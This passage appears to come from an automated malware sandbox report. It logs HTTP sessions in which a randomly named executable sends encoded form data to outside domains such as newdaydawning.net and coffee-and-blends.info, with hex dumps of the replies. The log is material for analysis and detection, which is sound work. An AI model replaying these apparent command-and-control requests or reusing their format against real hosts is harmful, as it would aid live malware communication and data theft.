                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 2b 35 42 37 38 31 51 73 38 75 66 69 66 2b 59 63 52 35 6b 4b 35 4f 68 45 42 68 49 48 65 56 66 65 59 50 6a 71 31 36 4a 49 45 73 77 6f 6b 75 6a 2b 67 6e 6b 56 63 5a 4f 72 79 71 77 62 73 37 43 64 48 53 38 70 70 4a 42 58 70 37 71 72 58 6f 6a 6b 2f 6f 77 7a 52 66 4b 55 39 50 4c 6c 34 72 6a 49 36 37 78 76 6c 43 72 4e 75 54 47 45 6a 78 61 46 42 54 30 54 71 57 71 35 50 36 2f 68 58 58 6b 6f 66 6b 71 7a 33 6b 4a 7a 6e 32 34 69 65 53 71 42 69 50 74 35 46 39 6c 45 76 44 52 7a 43 6d 50 6a 63 45 68 75 59 35 34 4c 77 59 34 41 49 61 6d 70 52 48 52 74 36 51 72 46 46 49 37 77 50 78 41 45 6f 64 74 31 73 6e 37 2f 4d 61 63 32 51 66 39 57 6d 41 3d 3d
                                                    Data Ascii: 8T2hn=+5B781Qs8ufif+YcR5kK5OhEBhIHeVfeYPjq16JIEswokuj+gnkVcZOryqwbs7CdHS8ppJBXp7qrXojk/owzRfKU9PLl4rjI67xvlCrNuTGEjxaFBT0TqWq5P6/hXXkofkqz3kJzn24ieSqBiPt5F9lEvDRzCmPjcEhuY54LwY4AIampRHRt6QrFFI7wPxAEodt1sn7/Mac2Qf9WmA==
                                                    Oct 9, 2024 14:02:33.063723087 CEST495INHTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:02:32 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 32 64 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 0d 0a 35 31 0d 0a 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                    Data Ascii: 16<!doctype html><html 2dlang="en-US" prefix="og: https://ogp.me/ns#" 51><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
                                                    Oct 9, 2024 14:02:33.064151049 CEST1236INData Raw: 61 31 65 0d 0a 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22
                                                    Data Ascii: a1eUTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><script type="text/javascript">window.flatStyles = window.flatStyles || ''window.lightspeedOptimizeStylesheet = function () {const currentSt
                                                    Oct 9, 2024 14:02:33.064189911 CEST1236INData Raw: 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 0a 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 66 6c 61 74 53 74 79 6c 65 73 20 2b 3d 20 63 75 72 72 65 6e 74 53 74 79
                                                    Data Ascii: setAttribute( 'data-ls-optimized', '1' )window.flatStyles += currentStylesheet.innerHTMLthis.optimizing = false}} else {window.flatStyles = currentStylesheet.innerHTMLcurrentStylesheet.s
                                                    Oct 9, 2024 14:02:33.064203024 CEST125INData Raw: 65 6d 65 6e 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 74 61 67 4e 61 6d 65 20 21 3d 3d 20 27 48 45 41 44 27 20 29 20 7b 0a 09 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 20 73 74 79 6c 65 53 68 65 65 74 45
                                                    Data Ascii: ement.parentElement.tagName !== 'HEAD' ) {document.head.append( styleSheetElement )}}}</script>
                                                    Oct 9, 2024 14:02:33.083913088 CEST1236INData Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 74 63 62 2d 73 74 79 6c 65 2d 62 61 73 65 2d 74 68 72 69 76 65 5f 74 65 6d 70 6c 61 74 65 2d 32 31 39 22 20 20 6f 6e 4c 6f 61 64 3d 22 74 79 70 65
                                                    Data Ascii: 1f40<style type="text/css" id="tcb-style-base-thrive_template-219" onLoad="typeof window.lightspeedOptimizeStylesheet === 'function' && window.lightspeedOptimizeStylesheet()" class="tcb-lightspeed-style">.thrv_widget_menu{position:relative;
                                                    Oct 9, 2024 14:02:33.083950996 CEST1236INData Raw: 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 2d 74 72 69 67 67 65 72 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77
                                                    Data Ascii: -item-dropdown-trigger:not(:empty){margin-left:8px;}.tve-m-trigger{display:none;-webkit-tap-highlight-color:transparent;}.tve-m-trigger:focus,.tve-m-trigger:active{outline:none;}.tve-m-trigger .thrv_icon{font-size:33px;width:33px;height:33px;m
                                                    Oct 9, 2024 14:02:33.083964109 CEST1236INData Raw: 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68
                                                    Data Ascii: apper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu li{background-color:inherit;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu ul{display:none;position:relative;width:100%;left:0px;top:0px;}.thrv_wi
                                                    Oct 9, 2024 14:02:33.084068060 CEST1236INData Raw: 32 35 35 29 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 5b 63 6c 61 73 73 2a
                                                    Data Ascii: 255);}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="light-tmp"] ul.tve_w_menu .sub-menu{box-shadow:none;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="light-tmp"] ul.tve_w_menu li
                                                    Oct 9, 2024 14:02:33.084079981 CEST1236INData Raw: 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 64 72 6f 70 64 6f 77 6e 20 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 70 6f
                                                    Data Ascii: apper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger{position:relative;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger .thrv_icon{display:block;transition:opa
                                                    Oct 9, 2024 14:02:33.084090948 CEST1120INData Raw: 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 73 69 64 65 2d 72 69 67 68 74 20
                                                    Data Ascii: et_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-side-right ul.tve_w_menu::-webkit-scrollbar,.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-side-left ul.tve_w_menu::-webkit-scrollbar,.thr
                                                    Oct 9, 2024 14:02:33.084295034 CEST1236INData Raw: 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 73 69 64 65 2d 66 75 6c 6c 73 63 72 65 65 6e 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61
                                                    Data Ascii: tom-menu-switch-icon-"].tve-mobile-side-fullscreen ul.tve_w_menu::-webkit-scrollbar-thumb{height:23px;border:4px solid rgba(0,0,0,0);background-clip:padding-box;border-radius:7px;background-color:rgba(0,0,0,0.15);box-shadow:rgba(0,0,0,0.05) -1


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.94998744.213.25.70806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:34.282876015 CEST1827OUTPOST /igaf/ HTTP/1.1
                                                    Host: www.newdaydawning.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.newdaydawning.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1230
                                                    Cache-Control: no-cache
                                                    Referer: http://www.newdaydawning.net/igaf/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 2b 35 42 37 38 31 51 73 38 75 66 69 66 2b 59 63 52 35 6b 4b 35 4f 68 45 42 68 49 48 65 56 66 65 59 50 6a 71 31 36 4a 49 45 73 6f 6f 6e 64 72 2b 76 67 77 56 4f 4a 4f 72 73 36 77 61 73 37 43 45 48 52 4d 74 70 4a 46 70 70 34 65 72 59 70 44 6b 6f 4b 59 7a 49 50 4b 55 68 2f 4c 6b 33 4c 6a 6e 36 36 42 6a 6c 43 62 4e 75 54 47 45 6a 7a 75 46 58 32 55 54 74 6d 71 34 5a 71 2f 39 47 6e 6b 41 66 6b 79 6a 33 6c 4a 6a 6e 6d 59 69 65 79 36 42 6e 39 31 35 47 64 6c 4b 71 44 52 72 43 6d 44 38 63 45 39 59 59 35 38 31 77 59 41 41 4c 76 44 33 4b 32 68 70 76 79 37 46 48 34 44 4e 46 55 59 2f 73 5a 49 70 73 6d 57 66 53 61 4e 32 61 66 34 66 6b 37 6a 6c 4d 63 38 30 39 54 6a 6d 38 7a 35 66 2f 58 54 44 32 44 67 44 66 73 38 4e 63 34 53 62 6b 56 7a 6e 55 35 70 2f 30 4b 30 76 46 6f 64 6e 49 74 31 76 64 57 48 49 4e 72 64 70 7a 59 65 69 51 36 72 30 55 6e 5a 4f 45 41 65 6f 2f 4e 4b 79 6b 79 78 39 45 64 45 4b 4b 55 62 5a 55 53 30 39 7a 56 56 64 6a 6f 73 2f 33 35 76 4c 74 37 4b 6a 4f 33 61 36 63 45 42 47 67 50 77 47 [TRUNCATED]
                                                    Data Ascii: 8T2hn=+5B781Qs8ufif+YcR5kK5OhEBhIHeVfeYPjq16JIEsoondr+vgwVOJOrs6was7CEHRMtpJFpp4erYpDkoKYzIPKUh/Lk3Ljn66BjlCbNuTGEjzuFX2UTtmq4Zq/9GnkAfkyj3lJjnmYiey6Bn915GdlKqDRrCmD8cE9YY581wYAALvD3K2hpvy7FH4DNFUY/sZIpsmWfSaN2af4fk7jlMc809Tjm8z5f/XTD2DgDfs8Nc4SbkVznU5p/0K0vFodnIt1vdWHINrdpzYeiQ6r0UnZOEAeo/NKykyx9EdEKKUbZUS09zVVdjos/35vLt7KjO3a6cEBGgPwGqVfYbVKpYtLRlgpQkEx10LogTh0fCDuDc+3jcGliYVtkNNrNOg7cVtGc4YG5O3n/9Qvoq/CGy3ZYO8QWy77f0W4iEA0PG8PeljPtZfQ0Ey4mdLHy6qOiFS5vcXqAnRygjZdrElTsA4RnIvJGXA+Ov9t1cOvDFEFpQkY4qX3c6wSkOB4c/XBphGwkedO1hOnz0/GVCcItIORI/KPqiMAMoOXiEd6Mbxrz+ZigMhW9o3vBetf27EmwjW8d/CBhe1Yp6yBz72GN+aK9J0jVIc2FdwFiqGQeE2nhKzGhpzwwNaAlo61qFpKqMiigofeOPasM9QU0WGAh7WAg+/gqxhT8Of6Yc8dO/hASPAJOrkdYx87L+TxQeLuVy7pHql9zCxQWf0UtPzjB6fNcoLpWMPsiu67TXzNZgIDBhSVjG0fK3G8eXj/0q/4CcJOzCWUHgU9JD1Y6Yob/YEsobJX4f1IprrgfJOtOJmQDvvYcTQzht2rA29UhJeT5VIDhYl1CmoUp0sQLbGSuQMLH7E89S0O7i7H/3ef+LOq0MRmb4F59saj23BkrY1epAJ1i4mpe54960xkmsYABCD7AklWeJ4YS2OYcCTSQDRihyh46LveYIgUqBrX8UirHeccUDjHZ7IpMxjVXHR084FfITcyRaHt2fUhs5OCFFGIvHe [TRUNCATED]
                                                    Oct 9, 2024 14:02:35.483587980 CEST489INHTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:02:34 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                    Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
                                                    Oct 9, 2024 14:02:35.483954906 CEST1236INData Raw: 61 31 65 0d 0a 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22
                                                    Data Ascii: a1eUTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><script type="text/javascript">window.flatStyles = window.flatStyles || ''window.lightspeedOptimizeStylesheet = function () {const currentSt
                                                    Oct 9, 2024 14:02:35.484019041 CEST224INData Raw: 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 0a 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 66 6c 61 74 53 74 79 6c 65 73 20 2b 3d 20 63 75 72 72 65 6e 74 53 74 79
                                                    Data Ascii: setAttribute( 'data-ls-optimized', '1' )window.flatStyles += currentStylesheet.innerHTMLthis.optimizing = false}} else {window.flatStyles = currentStylesheet.innerHTML
                                                    Oct 9, 2024 14:02:35.484050035 CEST1137INData Raw: 63 75 72 72 65 6e 74 53 74 79 6c 65 73 68 65 65 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d
                                                    Data Ascii: currentStylesheet.setAttribute( 'data-ls-optimized', '1' )}}} catch ( error ) {console.warn( error )}if ( currentStylesheet.parentElement.tagName !== 'HEAD' ) {/* always make sure that those styl
                                                    Oct 9, 2024 14:02:35.498430014 CEST1236INData Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 74 63 62 2d 73 74 79 6c 65 2d 62 61 73 65 2d 74 68 72 69 76 65 5f 74 65 6d 70 6c 61 74 65 2d 32 31 39 22 20 20 6f 6e 4c 6f 61 64 3d 22 74 79 70 65
                                                    Data Ascii: 1f40<style type="text/css" id="tcb-style-base-thrive_template-219" onLoad="typeof window.lightspeedOptimizeStylesheet === 'function' && window.lightspeedOptimizeStylesheet()" class="tcb-lightspeed-style">.thrv_widget_menu{position:relative;
                                                    Oct 9, 2024 14:02:35.498462915 CEST1236INData Raw: 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 2d 74 72 69 67 67 65 72 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77
                                                    Data Ascii: -item-dropdown-trigger:not(:empty){margin-left:8px;}.tve-m-trigger{display:none;-webkit-tap-highlight-color:transparent;}.tve-m-trigger:focus,.tve-m-trigger:active{outline:none;}.tve-m-trigger .thrv_icon{font-size:33px;width:33px;height:33px;m
                                                    Oct 9, 2024 14:02:35.498478889 CEST1236INData Raw: 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68
                                                    Data Ascii: apper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu li{background-color:inherit;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu ul{display:none;position:relative;width:100%;left:0px;top:0px;}.thrv_wi
                                                    Oct 9, 2024 14:02:35.498645067 CEST1236INData Raw: 32 35 35 29 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 5b 63 6c 61 73 73 2a
                                                    Data Ascii: 255);}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="light-tmp"] ul.tve_w_menu .sub-menu{box-shadow:none;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="light-tmp"] ul.tve_w_menu li
                                                    Oct 9, 2024 14:02:35.498660088 CEST896INData Raw: 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 64 72 6f 70 64 6f 77 6e 20 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 70 6f
                                                    Data Ascii: apper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger{position:relative;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger .thrv_icon{display:block;transition:opa
                                                    Oct 9, 2024 14:02:35.498675108 CEST1236INData Raw: 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 73 69 64 65 2d 6c 65 66 74 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 2c 2e 74 68 72 76 5f 77 69 64 67
                                                    Data Ascii: ass*="tve-custom-menu-switch-icon-"].tve-mobile-side-left ul.tve_w_menu,.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-side-fullscreen ul.tve_w_menu{top:0px;display:block;height:100vh;padding:60px;position:fix
                                                    Oct 9, 2024 14:02:35.498689890 CEST1236INData Raw: 64 65 2d 72 69 67 68 74 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 2c 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61
                                                    Data Ascii: de-right ul.tve_w_menu::-webkit-scrollbar-thumb,.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-side-left ul.tve_w_menu::-webkit-scrollbar-thumb,.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-ico


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.94998844.213.25.70806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:36.824409008 CEST517OUTGET /igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeths6OaqB6aU1oO66EyRWu95qtLC+XaCQo95JR9SCocHD8In7sYhzsBDy4zub0g2aDA== HTTP/1.1
                                                    Host: www.newdaydawning.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Oct 9, 2024 14:02:37.982923985 CEST471INHTTP/1.1 301 Moved Permanently
                                                    Date: Wed, 09 Oct 2024 12:02:37 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Location: http://newdaydawning.net/igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeths6OaqB6aU1oO66EyRWu95qtLC+XaCQo95JR9SCocHD8In7sYhzsBDy4zub0g2aDA==
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Oct 9, 2024 14:02:38.003098011 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.949989217.160.0.231806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:43.294836998 CEST805OUTPOST /fhdl/ HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.coffee-and-blends.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 194
                                                    Cache-Control: no-cache
                                                    Referer: http://www.coffee-and-blends.info/fhdl/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 47 62 79 43 5a 51 31 77 66 78 70 70 6e 4c 37 4e 38 37 4a 32 67 38 6f 5a 4b 2b 57 79 70 44 53 64 51 56 65 30 39 58 57 4b 36 6f 53 41 4f 56 6a 73 47 63 56 50 70 4c 78 32 45 35 52 43 34 43 2f 4a 62 73 4a 36 58 74 69 64 31 6a 4a 68 4a 4e 57 46 67 7a 6b 4b 6f 41 5a 72 66 77 69 75 4b 4f 36 53 66 36 56 50 41 66 64 59 41 50 59 30 75 4a 48 79 4f 65 57 4a 6d 57 51 6a 43 36 51 43 71 75 7a 37 43 78 73 48 78 39 5a 43 31 47 54 42 45 4e 54 71 47 45 71 5a 76 55 2f 37 35 36 4d 54 37 32 4a 41 46 45 2b 48 78 48 57 5a 6d 35 45 4a 4c 30 51 2f 65 32 35 46 4b 34 6c 66 61 31 64 66
                                                    Data Ascii: 8T2hn=GbyCZQ1wfxppnL7N87J2g8oZK+WypDSdQVe09XWK6oSAOVjsGcVPpLx2E5RC4C/JbsJ6Xtid1jJhJNWFgzkKoAZrfwiuKO6Sf6VPAfdYAPY0uJHyOeWJmWQjC6QCquz7CxsHx9ZC1GTBENTqGEqZvU/756MT72JAFE+HxHWZm5EJL0Q/e25FK4lfa1df
                                                    Oct 9, 2024 14:02:44.031128883 CEST779INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 09 Oct 2024 12:02:43 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Content-Encoding: gzip
                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
